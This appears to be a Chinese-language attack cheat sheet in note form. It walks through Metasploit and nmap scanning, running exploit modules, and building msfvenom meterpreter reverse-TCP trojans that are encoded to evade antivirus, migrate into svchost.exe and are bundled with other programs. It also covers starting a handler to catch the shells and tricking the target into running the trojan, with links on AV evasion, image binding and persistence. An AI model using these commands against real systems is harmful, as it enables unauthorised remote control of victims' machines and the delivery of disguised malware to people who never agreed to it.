攻击方式 利用漏洞 利用后门 一 利用漏洞 1 扫描端口 (一)使用msf扫描 (1)查看可用端口
search portscan(2)使用扫描模块
use *****(3)查看配置选项,配置扫描模块
show options set LPOST ***(4)运行扫描模块
run(二)使用nmap 扫描
nmap -O -Pn/-p0 IP nmap -sV IP2 搜索漏洞
search 服务名(version)3 使用漏洞模块
use ***4 配置漏洞模块
show options set HOST IP5 发起进攻
exploit二 利用木马 1 生成木马(固定写法)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.5 lport=6666 -f exe > hack.exe捆绑svchost.exe应用程序
msfvenom -p windows/meterpreter/reverse_tcp --platform LHOST=192.168.1.4 LPORT=5555 -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f exe > /root/Desktop/shellcode.exe -p 选择payload -e 选择编码器 -i 编码次数 -f 编译后的格式 -x 捆绑程序 -a 系统位数 x64 x86 x86_64想办法让靶机执行木马 2 服务器启动接受木马请求 打开数据库服务
service postgresql start启动metasploit
msfconsole选择攻击模块
use exploit/multi/handler设置payload
set payload windows/meterpreter/reverse_tcp查看设置选项,配置HOST PORT
show options启动服务
run免杀 https://blog.csdn.net/weixin_40602516/article/details/81144189 https://blog.csdn.net/zsc201825/article/details/80918185 https://blog.csdn.net/weixin_39997829/article/details/80001681
图片捆绑 https://blog.csdn.net/xiaoi123/article/details/78915374
自己自启 https://www.cnblogs.com/findumars/p/6435434.html
使用mingw32 自研 apt-get install mingw-w64
修改FakeImageExploiter.sh文件,替换成i686-w64-mingw32-gcc
